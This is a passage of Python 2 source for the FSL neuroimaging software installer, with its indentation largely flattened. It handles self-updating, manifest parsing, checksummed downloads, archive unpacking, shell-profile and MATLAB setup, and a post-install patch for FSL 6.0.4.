'''Takes path to FSLDIR and finds installed version details'''
MsgUser.debug("Looking for fsl in %s" % fsldir)
v_file = os.path.join(fsldir, 'etc', 'fslversion')
if os.path.exists(v_file):
f = open(v_file)
v_string = f.readline()
f.close()
try:
version = Version(v_string.strip())
except ValueError:
raise NotAFslVersion(
"%s not a valid "
"version string" % (v_string.strip()))
else:
MsgUser.debug(
"No version information found - "
"is this actually an FSL dir?")
raise GetInstalledVersionError(
"Cannot find the version information - "
"is this actually an FSL dir?")
MsgUser.debug("Found version %s" % (version))
return version
def which_shell():
return os.path.basename(os.getenv("SHELL"))
class SelfUpdateError(Exception):
pass
def self_update(server_url):
'''Check for and apply an update to myself'''
# See if there is a newer version available
if 'fslinstaller' in sys.argv[0]:
try:
installer = get_installer(server_url)
except GetInstallerError, e:
MsgUser.debug("Failed to get installer version %s." % (str(e)))
raise SelfUpdateError('Failed to get installer version. '
'Please try again later.')
MsgUser.debug("Server has version " + installer['version'])
if Version(installer['version']) <= version:
MsgUser.debug("Installer is up-to-date.")
return
# There is a new version available - download it
MsgUser.message("There is a newer version (%s) of the installer "
"(you have %s) updating..." % (
installer['version'], version))
(_, tmpfname) = temp_file_name(mode='w', close=True)
downloaded = False
while downloaded is False:
try:
file_url = '/'.join(
(Settings.mirror.rstrip('/'), installer['filename']))
download_file(
url=file_url,
localf=tmpfname)
if (
file_checksum(tmpfname, installer['checksum_type']) !=
installer['checksum']):
raise SelfUpdateError(
"Found update to installer but download "
"was corrupt. Please try again later.")
except DownloadFileError, e:
if Settings.mirror != Settings.main_mirror:
MsgUser.warning(
"Download from mirror failed, re-trying from "
"main FSL download site")
Settings.mirror = Settings.main_mirror
else:
MsgUser.debug("Failed to update installer %s." % (str(e)))
raise SelfUpdateError(
'Found update to installer but unable to '
'download the new version. Please try again.')
else:
downloaded = True
# Now run the new installer
# EXEC new script with the options we were given
os.chmod(tmpfname, 0755)
c_args = [sys.executable, tmpfname, ]
c_args.extend(sys.argv[1:])
MsgUser.debug(
"Calling %s %s" % (sys.executable, c_args))
os.execv(sys.executable, c_args)
else:
# We are now running the newly downloaded installer
MsgUser.ok('Installer updated to latest version %s' % (str(version)))
MsgUser.ok("Installer self update successful.")
class ServerFailure(Exception):
pass
class BadVersion(Exception):
pass
class GetInstallerError(Exception):
pass
def get_installer(server_url):
MsgUser.debug("Checking %s for "
"installer information" % (server_url))
manifest = get_web_manifest(server_url)
return manifest['installer']
@memoize
def get_releases(server_url):
'''Return a hash with all information about available
versions for this OS'''
computer = Host
MsgUser.debug("Getting web manifest")
manifest = get_web_manifest(server_url)
try:
os_definition = manifest[computer.o_s][computer.vendor]
except KeyError:
raise UnsupportedOs("%s %s not supported by this installer" % (
computer.o_s, computer.vendor
))
t_version = computer.version.major
alias_t = 'alias'
if alias_t in os_definition.keys():
if str(t_version) in os_definition[alias_t]:
os_parent = os_definition[alias_t][
str(t_version)]['parent']
t_version = os_definition[alias_t][
str(t_version)]['version']
os_definition = manifest[computer.o_s][os_parent]
if computer.arch not in os_definition.keys():
raise UnsupportedOs("%s %s not supported" % (
computer.vendor,
computer.arch
))
os_def = os_definition[computer.arch]
while t_version > 0:
MsgUser.debug("Trying version %s" % (t_version))
if str(t_version) not in os_def.keys():
MsgUser.debug("...not found")
t_version -= 1
else:
break
if t_version == 0:
raise UnsupportedOs("%s %s not supported" % (
computer.vendor,
computer.version.major
))
elif t_version != computer.version.major:
MsgUser.warning(
"%s %s not officially supported "
"- trying to locate support for an earlier "
"version - this may not work" % (
computer.vendor, computer.version.major))
return os_definition[computer.arch][str(t_version)]
class ExtraDownloadError(Exception):
pass
@memoize
def get_extra(server_url, extra_type):
'''Return a hash with all information about available
versions of source code'''
MsgUser.debug("Getting web manifest")
manifest = get_web_manifest(server_url)
try:
extra = manifest[extra_type]
except KeyError:
raise ExtraDownloadError("Unrecognised extra %s" % (extra_type))
return extra
class ImproperlyConfigured(Exception):
pass
def list_releases(url):
releases = get_releases(url)
MsgUser.message("Available FSL versions for this OS:")
MsgUser.debug(releases)
rels = []
for v, release in releases.items():
if 'date' in release:
rdate = release['date']
else:
rdate = "Third-party package"
rels.append((v, rdate))
for v, rdate in sorted(rels, reverse=True):
MsgUser.message("%s\t(%s)" % (v, rdate))
def list_builds(url):
'''Lists all available FSL builds. '''
manifest = dict(get_web_manifest(url))
MsgUser.message("All available FSL builds:")
centos = manifest['linux']['centos']['x86_64']
macos = manifest['darwin']['apple']['x86_64']
def get_platform(s):
match = re.match(r'^fsl-(.+)-(.+).tar.gz$', s)
plat = match.group(2)
return plat
fslversions = collections.defaultdict(set)
for builds in itertools.chain(centos.values(), macos.values()):
for fslversion, info in builds.items():
fslversions[fslversion].add(get_platform(info['filename']))
for fslversion, plats in fslversions.items():
MsgUser.message('%s - %s' % (fslversion, ', '.join(plats)))
def latest_release(url):
releases = get_releases(url)
MsgUser.debug("Got version information: %s" % (releases))
versions = [Version(x) for x in releases.keys()]
MsgUser.debug("Versions: %s" % (versions))
return releases[str(sorted(versions)[-1])]
class InstallInstallerError(Exception):
pass
def install_installer(fsldir):
'''Install this script into $FSLDIR/etc'''
targetfolder = os.path.join(fsldir, 'etc')
as_root = False
installer = os.path.abspath(__file__)
MsgUser.debug(
"Copying fslinstaller (%s) to %s" % (
installer,
targetfolder))
if not is_writeable(targetfolder):
if not is_writeable_as_root(targetfolder):
raise InstallInstallerError("Cannot write to folder as root user.")
else:
as_root = True
copy_file(
installer, os.path.join(targetfolder, "fslinstaller.py"),
as_root)
class InstallQuestions(object):
def __init__(self):
self.questions = {}
self.validators = {}
self.type = {}
self.default = {}
        self.defaults = False
        self.answers = {}
def add_question(self, key, question, default, qtype, validation_f):
self.questions[key] = question
self.default[key] = default
self.type[key] = qtype
self.validators[key] = validation_f
def ask_question(self, key, default=None):
# Ask a question
no_answer = True
validator = self.validators[key]
def parse_answer(q_type, answer):
if q_type == 'bool':
if answer.lower() == 'yes':
return True
else:
return False
else:
return answer
if not default:
default = self.default[key]
if self.defaults:
MsgUser.debug(self.questions[key])
MsgUser.debug("Automatically using the default %s" % (default))
            answer = parse_answer(self.type[key], default)
            self.answers[key] = answer
            no_answer = False
while no_answer:
MsgUser.question(
"%s? %s:" % (
self.questions[key],
'[%s]' % (default)))
your_answer = raw_input()
MsgUser.debug("Your answer was %s" % (your_answer))
if your_answer == '':
MsgUser.debug("You want the default")
your_answer = default
if validator(your_answer):
answer = parse_answer(self.type[key], your_answer)
no_answer = False
MsgUser.debug("Returning the answer %s" % (answer))
return answer
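# Sketch of how the question machinery above is used elsewhere in this script
# (the key name 'example' is hypothetical; the real keys are registered on
# Settings.inst_qus further down):
#
#     >>> qs = InstallQuestions()
#     >>> qs.add_question('example', "Continue with the install", 'yes', 'bool', yes_no)
#     >>> qs.defaults = True          # non-interactive: take the default answer
#     >>> qs.ask_question('example')
#     True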
def yes_no(answer):
if answer.lower() == 'yes' or answer.lower() == 'no':
return True
else:
MsgUser.message("Please enter yes or no.")
return False
def check_install_location(folder):
'''Don't allow relative paths'''
MsgUser.debug("Checking %s is an absolute path" % (folder))
if (folder == '.' or
folder == '..' or
folder.startswith('./') or
folder.startswith('../') or
folder.startswith('~')):
MsgUser.message("Please enter an absolute path.")
return False
return True
def external_validate(what_to_check):
'''We will validate elsewhere'''
return True
def check_fsl_install(fsldir):
'''Check if this folder contains FSL install'''
MsgUser.debug("Checking %s is an FSL install" % (fsldir))
if os.path.isdir(fsldir):
if os.path.exists(
os.path.join(fsldir, 'etc', 'fslversion')
):
return True
return False
def fsl_downloadname(suffix, version):
return 'fsl-%s-%s' % (
version, suffix)
class Settings(object):
version = version
title = "--- FSL Installer - Version %s ---" % (version)
main_server = 'fsl.fmrib.ox.ac.uk'
mirrors = [build_url_with_protocol('https',
main_server, ('fsldownloads',
'')), ]
mirrors_file = 'fslmirrorlist.txt'
manifest_json = 'manifest.json'
manifest_csv = 'manifest.csv'
main_mirror = mirrors[0]
mirror = main_mirror
applications = ['bin/fslview.app', 'bin/assistant.app']
x11 = {'bad_versions': [],
'download_url': "http://xquartz.macosforge.org/landing/",
'apps': ['XQuartz.app', 'X11.app', ],
'location': "/Applications/Utilities"}
default_location = '/usr/local/fsl'
post_inst_dir = "etc/fslconf"
inst_qus = InstallQuestions()
inst_qus.add_question('version_match',
"The requested version matches the installed "
"version - do you wish to re-install FSL",
'no', 'bool', yes_no)
inst_qus.add_question('location',
"Where would you like the FSL install to be "
"(including the FSL folder name)",
default_location, 'path', check_install_location)
inst_qus.add_question('del_old',
"FSL exists in the current location, "
"would you like to keep a backup of the old "
"version (N.B. You will not be able to use the old "
"version)",
'no', 'bool', yes_no)
inst_qus.add_question('create',
"Install location doesn't exist, should I create it",
'yes', 'bool', yes_no)
inst_qus.add_question('inst_loc',
"Where is the FSL folder (e.g. /usr/local/fsl)",
default_location, 'path', check_fsl_install)
inst_qus.add_question('skipmd5',
"I was unable to download the checksum of "
"the install file so cannot confirm it is correct. "
"Would you like to install anyway",
'no', 'bool', yes_no)
inst_qus.add_question('overwrite',
"There is already a local copy of the file, would "
"you like to overwrite it",
"yes", 'bool', yes_no)
inst_qus.add_question('upgrade',
"Would you like to install upgrade",
"yes", 'bool', yes_no)
inst_qus.add_question('update',
"Would you like to install update",
"yes", 'bool', yes_no)
def get_json(web_url):
MsgUser.debug("Opening "+web_url)
try:
url = open_url(web_url)
return json.load(url)
except OpenUrlError, e:
raise ServerFailure(str(e))
# [ linux, centos, x86_64, 6, filename, 'fname',
# version, 'version', date, 'date', checksum_type, 'checksum_type',
# checksum, 'checksum', supported, 'true/false', notes, 'notes',
# instructions, 'instructions']
# [ linux, redhat, alias, centos, supported, True/false, version, 'version' ]
# [ 'installer', filename, 'fname', version, 'version', date, 'date',
# checksum_type, 'checksum_type', checksum, 'checksum', supported,
# 'true/false', notes, 'notes', instructions, 'instructions']
# [ feeds, filename, 'fname', version, 'version',
# date, 'date', checksum_type, 'checksum_type', checksum, 'checksum',
# supported, 'true/false', notes, 'notes', instructions, 'instructions']
# [ sources, filename, 'fname', version, 'version',
# date, 'date', checksum_type, 'checksum_type', checksum, 'checksum',
# supported, 'true/false', notes, 'notes', instructions, 'instructions']
class AutoDict(dict):
'''Automatically create a nested dict'''
def __getitem__(self, item):
try:
return dict.__getitem__(self, item)
except KeyError:
value = self[item] = type(self)()
return value
def freeze(self):
'''Returns a dict representation of an AutoDict'''
frozen = {}
for k, v in self.items():
if type(v) == type(self):
frozen[k] = v.freeze()
else:
frozen[k] = v
return frozen
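# Small sketch of the AutoDict behaviour relied on by get_csv_dict below (the
# keys are illustrative):
#
#     >>> d = AutoDict()
#     >>> d['linux']['centos']['x86_64'] = {'filename': 'example.tar.gz'}
#     >>> d.freeze()['linux']['centos']['x86_64']['filename']
#     'example.tar.gz'
#
# Intermediate levels are created on first access, and freeze() converts the
# nested AutoDicts back into plain dicts.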
def get_csv_dict(web_url):
MsgUser.debug("Opening "+web_url)
try:
url = open_url(web_url)
manifest_reader = csv.reader(
url, delimiter=',', quoting=csv.QUOTE_MINIMAL)
a_dict = AutoDict()
for line in manifest_reader:
MsgUser.debug(line)
if line[0] == 'feeds':
items = iter(line[1:])
base_dict = dict(zip(items, items))
a_dict[line[0]] = base_dict
elif line[0] == 'sources':
items = iter(line[1:])
base_dict = dict(zip(items, items))
a_dict[line[0]] = base_dict
elif line[0] == 'installer':
items = iter(line[1:])
base_dict = dict(zip(items, items))
a_dict[line[0]] = base_dict
else:
# Install package or alias
if line[2] == 'alias':
items = iter(line[4:])
base_dict = dict(zip(items, items))
a_dict[
str(line[0])][
str(line[1])][
str(line[2])][
str(line[3])] = base_dict
else:
items = iter(line[5:])
base_dict = dict(zip(items, items))
MsgUser.debug(
",".join(
(line[0], line[1], line[2], line[3], line[4])))
a_dict[
str(line[0])][
str(line[1])][
str(line[2])][
str(line[3])][
str(line[4])] = base_dict
except OpenUrlError, e:
raise ServerFailure(str(e))
MsgUser.debug(a_dict)
return a_dict.freeze()
class InvalidVersion(Exception):
pass
def get_web_version_and_details(
server_url=Settings.mirror,
request_version=None):
if request_version is None:
details = latest_release(server_url)
try:
version = Version(details['version'])
except KeyError:
try:
redirect = details['redirect']
raise DownloadError(
"Installer not supported on this platform."
"Please visit %s for download instructions" % redirect)
except KeyError:
MsgUser.debug(
"Can't find version or redirect - %s" % details)
raise DownloadError(
"Unsupported OS"
)
else:
MsgUser.debug("Requested version %s" % request_version)
releases = get_releases(server_url)
try:
version = Version(request_version)
except ValueError:
raise DownloadError(
"%s doesn't look like a version" % request_version)
if request_version not in releases.keys():
raise DownloadError(
"%s isn't an available version" % request_version)
details = releases[request_version]
return (version, details)
def download_release(
server_url=Settings.mirror, to_temp=False,
request_version=None, skip_verify=False,
keep=False, source_code=False, feeds=False):
(version, details) = get_web_version_and_details(
server_url, request_version)
if request_version is None:
request_version = str(version)
if source_code or feeds:
if source_code:
extra_type = 'sources'
MsgUser.message("Downloading source code")
else:
extra_type = 'feeds'
MsgUser.message("Downloading FEEDS")
try:
releases = get_extra(server_url, extra_type)
except ExtraDownloadError, e:
raise DownloadError(
"Unable to find details for %s" % (extra_type)
)
to_temp = False
try:
details = releases[request_version]
except KeyError:
raise DownloadError(
"%s %s isn't available" % (request_version, extra_type)
)
MsgUser.debug(details)
if to_temp:
try:
(_, local_filename) = temp_file_name(close=True)
except Exception, e:
MsgUser.debug("Error getting temporary file name %s" % (str(e)))
raise DownloadError("Unable to begin download")
else:
local_filename = details['filename']
if os.path.exists(local_filename):
if os.path.isfile(local_filename):
MsgUser.message("%s exists" % (local_filename))
overwrite = Settings.inst_qus.ask_question('overwrite')
if overwrite:
MsgUser.warning(
"Erasing existing file %s" % local_filename)
try:
os.remove(local_filename)
except Exception:
raise DownloadError(
"Unabled to remove local file %s - remove"
" it and try again" % local_filename)
else:
raise DownloadError("Aborting download")
else:
raise DownloadError(
"There is a directory named %s "
"- cannot overwrite" % local_filename)
MsgUser.debug(
"Downloading to file %s "
"(this may take some time)." % (local_filename))
MsgUser.message(
"Downloading...")
downloaded = False
while downloaded is False:
try:
file_url = '/'.join(
(Settings.mirror.rstrip('/'), details['filename']))
download_file(
url=file_url,
localf=local_filename)
if (not skip_verify and
(details['checksum'] !=
file_checksum(local_filename, details['checksum_type']))):
raise DownloadError('Downloaded file fails checksum')
MsgUser.ok("File downloaded")
except DownloadFileError, e:
MsgUser.debug(str(e))
if Settings.mirror != Settings.main_mirror:
MsgUser.warning(
"Download from mirror failed, re-trying from "
"main FSL download site")
Settings.mirror = Settings.main_mirror
else:
raise DownloadError(str(e))
else:
downloaded = True
return (local_filename, version, details)
class DownloadError(Exception):
pass
def shell_config(shell, fsldir, skip_root=False):
MsgUser.debug("Building environment for %s" % (shell))
env_lines = ''
if shell in BOURNE_SHELLS:
if skip_root:
env_lines += '''if [ -x /usr/bin/id ]; then
if [ -z "$EUID" ]; then
# ksh and dash doesn't setup the EUID environment var
EUID=`id -u`
fi
fi
if [ "$EUID" != "0" ]; then
'''
env_lines += '''
# FSL Setup
FSLDIR=%s
PATH=${FSLDIR}/bin:${PATH}
export FSLDIR PATH
. ${FSLDIR}/etc/fslconf/fsl.sh
'''
if skip_root:
env_lines += '''fi'''
match = "FSLDIR="
replace = "FSLDIR=%s"
elif shell in C_SHELLS:
if skip_root:
env_lines += '''if ( $uid != 0 ) then
'''
env_lines += '''
# FSL Setup
setenv FSLDIR %s
setenv PATH ${FSLDIR}/bin:${PATH}
source ${FSLDIR}/etc/fslconf/fsl.csh
'''
if skip_root:
env_lines += '''
endif'''
match = "setenv FSLDIR"
replace = "setenv FSLDIR %s"
elif shell == 'matlab':
env_lines = '''
%% FSL Setup
setenv( 'FSLDIR', '%s' );
setenv('FSLOUTPUTTYPE', 'NIFTI_GZ');
fsldir = getenv('FSLDIR');
fsldirmpath = sprintf('%%s/etc/matlab',fsldir);
path(path, fsldirmpath);
clear fsldir fsldirmpath;
'''
match = "setenv( 'FSLDIR',"
replace = "setenv( 'FSLDIR', '%s' );"
else:
raise ValueError("Unknown shell type %s" % shell)
return (env_lines % (fsldir), match, replace % (fsldir))
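# Hedged illustration of what shell_config returns for a Bourne-style shell,
# assuming 'sh' appears in BOURNE_SHELLS (defined earlier in this script); the
# FSLDIR path is an example:
#
#     >>> (lines, match, replace) = shell_config('sh', '/usr/local/fsl')
#     >>> match
#     'FSLDIR='
#     >>> replace
#     'FSLDIR=/usr/local/fsl'
#
# `lines` holds the block of profile text with FSLDIR substituted in, ready to
# be appended by add_fsldir() or patched in place by fix_fsldir() below.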
def get_profile(shell):
home = os.path.expanduser("~")
dotprofile = os.path.join(home, '.profile')
if shell == 'bash':
profile = os.path.join(home, '.bash_profile')
if not os.path.isfile(profile) and os.path.isfile(dotprofile):
profile = dotprofile
elif shell == 'zsh':
profile = os.path.join(home, '.zprofile')
# ZSH will never source .profile
elif shell == 'sh':
profile = dotprofile
else:
cshprofile = os.path.join(home, '.cshrc')
if shell == 'csh':
profile = cshprofile
elif shell == 'tcsh':
profile = os.path.join(home, '.tcshrc')
if not os.path.isfile(profile) and os.path.isfile(cshprofile):
profile = cshprofile
else:
raise ValueError("Unsupported shell")
return profile
class FixFslDirError(Exception):
pass
def fix_fsldir(shell, fsldir):
(_, match, replace) = shell_config(shell, fsldir)
profile = get_profile(shell)
MsgUser.debug(
"Editing %s, replacing line beginning:%s with %s." %
(profile, match, replace))
try:
edit_file(profile, line_starts_replace, match, replace, False)
except EditFileError, e:
raise FixFslDirError(str(e))
class AddFslDirError(Exception):
pass
def add_fsldir(shell, fsldir):
(env_lines, _, _) = shell_config(shell, fsldir)
profile = get_profile(shell)
MsgUser.debug("Adding %s to %s" % (env_lines, profile))
try:
add_to_file(profile, env_lines, False)
except AddToFileError, e:
raise AddFslDirError(str(e))
class ConfigureMatlabError(Exception):
pass
class ConfigureMatlabWarn(Exception):
pass
def configure_matlab(fsldir, m_startup='', c_file=True):
'''Setup your startup.m file to enable FSL MATLAB functions to work'''
(mlines, match, replace) = shell_config('matlab', fsldir)
if m_startup == '':
m_startup = os.path.join(
os.path.expanduser('~'), 'Documents', 'MATLAB', 'startup.m')
if os.path.exists(m_startup):
# Check if already configured
MsgUser.debug("Looking for %s in %s" % (match, m_startup))
if file_contains(m_startup, match):
try:
MsgUser.debug('Updating MATLAB startup file.')
edit_file(
m_startup, line_starts_replace,
match, replace, False)
except EditFileError, e:
raise ConfigureMatlabError(str(e))
else:
MsgUser.debug('Adding FSL settings to MATLAB.')
try:
add_to_file(m_startup, mlines, False)
except AddToFileError, e:
raise ConfigureMatlabError(str(e))
elif c_file:
# No startup.m file found. Create one
try:
MsgUser.debug('No MATLAB startup.m file found, creating one.')
if not os.path.isdir(os.path.dirname(m_startup)):
                MsgUser.debug(
                    'Creating MATLAB folder %s.' % (os.path.dirname(m_startup)))
os.mkdir(os.path.dirname(m_startup))
create_file(m_startup, mlines, False)
except (OSError, CreateFileError), e:
MsgUser.debug(
'Unable to create ~/Documents/MATLAB/ folder or startup.m file,'
                ' cannot configure (%s).' % (str(e)))
raise ConfigureMatlabError(
"Unable to create your ~/Documents/MATLAB/ folder or startup.m, "
"so cannot configure MATLAB for FSL.")
else:
MsgUser.debug('MATLAB may not be installed, doing nothing.')
raise ConfigureMatlabWarn("I can't tell if you have MATLAB installed.")
class SetupEnvironmentError(Exception):
pass
class SetupEnvironmentSkip(Exception):
pass
def setup_system_environment(fsldir):
'''Add a system-wide profile setting up FSL for all users.
Only supported on Redhat/Centos'''
profile_d = '/etc/profile.d'
profile_files = ['fsl.sh', 'fsl.csh']
exceptions = []
skips = []
if os.getuid() != 0:
sudo = True
else:
sudo = False
if os.path.isdir(profile_d):
for profile in profile_files:
pf = profile.split('.')[1]
(lines, match, replace) = shell_config(pf, fsldir)
this_profile = os.path.join(profile_d, profile)
if os.path.exists(this_profile):
# Already has a profile file
# Does it contain an exact match for current FSLDIR?
match = file_contains_1stline(this_profile, replace)
if match != '':
# If there is an fsl.(c)sh then just fix
# the entry for FSLDIR
MsgUser.debug(
"Fixing %s for FSLDIR location." % (this_profile))
try:
edit_file(
this_profile, line_starts_replace,
match, replace, sudo)
except EditFileError, e:
exceptions.append(str(e))
else:
# No need to do anything
MsgUser.debug(
"%s already configured - skipping." %
(this_profile))
skips.append(profile)
else:
# Create the file
try:
create_file(this_profile, lines, sudo)
except CreateFileError, e:
exceptions.append(str(e))
else:
raise SetupEnvironmentError(
"No system-wide configuration folder found - Skipped")
if exceptions:
raise SetupEnvironmentError(".".join(exceptions))
if skips:
raise SetupEnvironmentSkip(".".join(skips))
def setup_environment(fsldir=None, system=False, with_matlab=False):
'''Setup the user's environment so that their
terminal finds the FSL tools etc.'''
# Check for presence of profile file:
if fsldir is None:
fsldir = get_fsldir()
user_shell = which_shell()
MsgUser.debug("User's shell is %s" % (user_shell))
try:
(profile_lines, _, _) = shell_config(user_shell, fsldir)
profile = get_profile(user_shell)
except ValueError, e:
raise SetupEnvironmentError(str(e))
cfile = False
if not os.path.isfile(profile):
MsgUser.debug("User is missing a shell setup file.")
cfile = True
if cfile:
MsgUser.debug("Creating file %s" % (profile))
try:
create_file(profile, profile_lines, False)
except CreateFileError, e:
raise SetupEnvironmentError(
"Unable to create profile %s" % (profile))
else:
# Check if user already has FSLDIR set
MsgUser.message("Setting up FSL software...")
try:
if file_contains(profile, "FSLDIR"):
MsgUser.debug("Updating FSLDIR entry.")
fix_fsldir(user_shell, fsldir)
else:
MsgUser.debug("Adding FSLDIR entry.")
add_fsldir(user_shell, fsldir)
except (AddFslDirError, FixFslDirError), e:
raise SetupEnvironmentError(
"Unable to update your profile %s"
" with FSL settings" % (profile))
if with_matlab:
MsgUser.debug("Setting up MATLAB")
try:
configure_matlab(fsldir)
except ConfigureMatlabError, e:
MsgUser.debug(str(e))
raise SetupEnvironmentError(str(e))
except ConfigureMatlabWarn, e:
MsgUser.skipped(str(e))
class PostInstallError(Exception):
pass
class InstallArchiveError(Exception):
pass
class UnknownArchiveType(Exception):
pass
def archive_type(archive):
    '''Determine the archive type by examining the file (via the 'file'
    command) and return the unpack command and option to use'''
archive_types = {
'gzip': ('tar', '-z'),
'bzip2': ('tar', '-j'),
'zip': ('zip', ''), }
try:
file_type = run_cmd("file %s" % (archive))
except RunCommandError, e:
raise UnknownArchiveType(str(e))
file_type = file_type.lower()
for f_type in ('gzip', 'bzip2', 'zip', ):
if f_type in file_type:
return archive_types[f_type]
raise UnknownArchiveType(archive)
def asl_gui_604_patch(fsldir, as_root=False):
'''
fsl 6.0.4 shipped with a broken fsleyes preview in asl_gui.
This function applies the simple patch to any new installation
that downloads FSL 6.0.4 using the fslinstaller.
1. parse fsl version
2. if version == 6.0.4 apply asl_gui patch, else do nothing and return
to test this patch with an existing fsl 6.0.4:
1. make a minimal $FSLDIR folder structure
- cd ~
- mkdir fsl_test
- cd fsl_test
- mkdir fsl
- cp -r $FSLDIR/etc fsl/
- cp -r $FSLDIR/python fsl/
- mkdir fsl/bin
2. tar it up
- tar -czf fsl-6.0.4-centos7_64.tar.gz fsl
- rm -r fsl # remove the fsl folder after tar-ing
3. run a test python install from the tar file
- be sure to use python 2.X (e.g. 2.7 works fine)
- python fslinstaller.py -f ~/fsl_test/fsl-6.0.4-centos7_64.tar.gz -d ~/fsl_test/fsl -p -M -D
'''
asl_file = os.path.join(fsldir, 'python', 'oxford_asl', 'gui', 'preview_fsleyes.py') #$FSLDIR/python/oxford_asl/gui/preview_fsleyes.py
vfile = os.path.join(fsldir, 'etc', 'fslversion')
vstring = ''
with open(vfile, 'r') as f:
vstring = f.readline()
v = vstring.split(':')[0] # e.g. 6.0.4:wkj2w3jh
if v == '6.0.4':
MsgUser.message("Patching asl_gui for fsl 6.0.4")
tfile = os.path.join(tempfile.mkdtemp(), "preview_fsleyes.py")
# backup asl_file
run_cmd_displayoutput('cp {} {}.bkup'.format(asl_file, asl_file), as_root=as_root)
# copy asl_file to tempfile
run_cmd_displayoutput('cp {} {}'.format(asl_file, tfile), as_root=as_root)
# ensure script can open temp file
run_cmd_displayoutput('chmod 775 {}'.format(tfile), as_root=as_root)
for line in fileinput.input(files=tfile, inplace=True):
line = re.sub('parent=parent, ready=ready', 'ready=ready, raiseErrors=True', line.rstrip())
print(line)
run_cmd_displayoutput('cp {} {}'.format(tfile, asl_file), as_root=as_root)
os.remove(tfile)
def post_install(
fsldir, settings, script="post_install.sh", quiet=False,
app_links=False, x11=False):
MsgUser.message("Performing post install tasks")
if is_writeable(fsldir):
as_root = False
elif is_writeable_as_root(fsldir):
as_root = True
else:
raise PostInstallError(
"Unable to write to target folder (%s)" % (fsldir))
install_installer(fsldir)
# apply asl_gui patch if fsl 6.0.4
asl_gui_604_patch(fsldir, as_root=as_root)
script_path = os.path.join(fsldir, Settings.post_inst_dir, script)
if x11:
try:
check_X11(settings.x11)
except CheckX11Warning, e:
MsgUser.warning(str(e))
else:
MsgUser.ok("X11 (required for GUIs) found")
if os.path.exists(script_path):
MsgUser.debug("Found post-install script %s" % (script_path))
if not os.access(script_path, os.X_OK):
raise PostInstallError(
"Unable to run post install script %s" % (script_path)
)
script_opts = '-f "%s"' % (fsldir)
if quiet:
script_opts += " -q"
command_line = " ".join((script_path, script_opts))
try:
run_cmd_displayoutput(command_line, as_root=as_root)
except RunCommandError, e:
raise PostInstallError(
"Error running post installation script (error %s)"
" - check the install log" % (str(e))
)
# Work around for mistake in 5.0.10 post setup script
mal = os.path.join(
fsldir, Settings.post_inst_dir,
'make_applications_links.sh')
if (os.path.exists(mal) and
not file_contains(script_path, "make_applications_links.sh")):
MsgUser.debug(
"Work around necessary for missing app link creation")
else:
app_links = False
if app_links:
try:
make_applications_links(fsldir, settings.applications)
except MakeApplicationLinksError, e:
for message in e.app_messages.values():
MsgUser.warning(message)
else:
MsgUser.ok("/Applications links created/updated")
MsgUser.ok("Post installation setup complete")
def install_archive(archive, fsldir=None):
def clean_up_temp():
try:
safe_delete(tempfolder, as_root)
except SafeDeleteError, sd_e:
MsgUser.debug(
"Unable to clean up temporary folder! "
"%s" % (str(sd_e)))
if not os.path.isfile(archive):
raise InstallError("%s isn't a file" % (archive))
if not fsldir:
try:
fsldir = get_fsldir(specified_dir=fsldir, install=True)
except GetFslDirError, e:
raise InstallError(str(e))
MsgUser.debug("Requested install of %s as %s" % (archive, fsldir))
if os.path.exists(fsldir):
# move old one out of way
MsgUser.debug("FSL version already installed")
keep_old = Settings.inst_qus.ask_question('del_old')
else:
keep_old = False
install_d = os.path.dirname(fsldir)
MsgUser.debug("Checking %s is writeable." % (install_d))
if is_writeable(install_d):
as_root = False
elif is_writeable_as_root(install_d):
as_root = True
else:
raise InstallArchiveError(
"Unable to write to target folder (%s), "
"even as a super user." % (install_d))
MsgUser.debug("Does %s require root for deletion? %s" % (
install_d, as_root))
try:
unarchive, ua_option = archive_type(archive)
except UnknownArchiveType, e:
raise InstallArchiveError(str(e))
# Generate a temporary name - eg fsl-<mypid>-date
tempname = '-'.join(('fsl', str(os.getpid()), str(time.time())))
tempfolder = os.path.join(install_d, tempname)
try:
run_cmd_dropstdout("mkdir %s" % (tempfolder), as_root=as_root)
except RunCommandError, e:
raise InstallArchiveError(
"Unable to create folder to install into.")
MsgUser.debug(
"Unpacking %s into folder %s." % (archive, tempfolder))
try:
if unarchive == 'tar':
unpack_cmd = 'tar -C %s -x %s -o -f %s' % (
tempfolder, ua_option, archive)
elif unarchive == 'zip':
MsgUser.debug(
"Calling unzip %s %s" % (ua_option, archive)
)
unpack_cmd = 'unzip %s %s' % (ua_option, archive)
try:
run_cmd_dropstdout(unpack_cmd, as_root=as_root)
except RunCommandError, e:
raise InstallArchiveError("Unable to unpack FSL.")
new_fsl = os.path.join(tempfolder, 'fsl')
if os.path.exists(fsldir):
# move old one out of way
try:
old_version = get_installed_version(fsldir)
except (NotAFslVersion, GetInstalledVersionError), e:
if keep_old:
old_version = Version('0.0.0')
MsgUser.warning(
"The contents of %s doesn't look like an "
"FSL installation! - "
"moving to fsl-0.0.0" % (fsldir))
old_fsl = '-'.join((fsldir, str(old_version)))
if os.path.exists(old_fsl):
MsgUser.debug(
"Looks like there is another copy of the "
"old version of FSL - deleting...")
try:
safe_delete(old_fsl, as_root)
except SafeDeleteError, e:
raise InstallError(
";".join((
"Install location already has a "
"%s - I've tried to delete it but"
" failed" % (old_fsl), str(e))))
if keep_old:
try:
MsgUser.debug(
"Moving %s to %s" % (fsldir, old_fsl))
move(fsldir, old_fsl, as_root)
MsgUser.message(
'''You can find your archived version of FSL in %s.
If you wish to restore it, remove %s and rename %s to %s''' % (
old_fsl, fsldir, old_fsl, fsldir))
except MoveError, mv_e:
# failed to move the old version
MsgUser.debug(
"Failed to move old version "
"- %s" % (str(mv_e)))
raise InstallError(
"Failed to backup old version (%s)" % (str(mv_e)))
else:
MsgUser.debug("Removing existing FSL install")
try:
safe_delete(fsldir, as_root)
MsgUser.debug("Deleted %s." % (fsldir))
except SafeDeleteError, e:
raise InstallError(
"Failed to delete %s - %s." % (fsldir, str(e)))
else:
old_fsl = ''
try:
MsgUser.debug("Moving %s to %s" % (new_fsl, fsldir))
move(new_fsl, fsldir, as_root)
except MoveError, e:
# Unable to move new install into place
MsgUser.debug(
"Move failed - %s." % (str(e)))
raise InstallError(
'Failed to move new version into place.')
except InstallError, e:
clean_up_temp()
raise InstallArchiveError(str(e))
clean_up_temp()
MsgUser.debug("Install complete")
MsgUser.ok("FSL software installed.")
return fsldir
def check_for_updates(url, fsldir, requested_v=None):
# Start an update
MsgUser.message("Looking for new version.")
try:
this_version = get_installed_version(fsldir)
except GetInstalledVersionError, e:
# We can't find an installed version of FSL!
raise InstallError(str(e))
else:
MsgUser.debug("You have version %s" % (this_version))
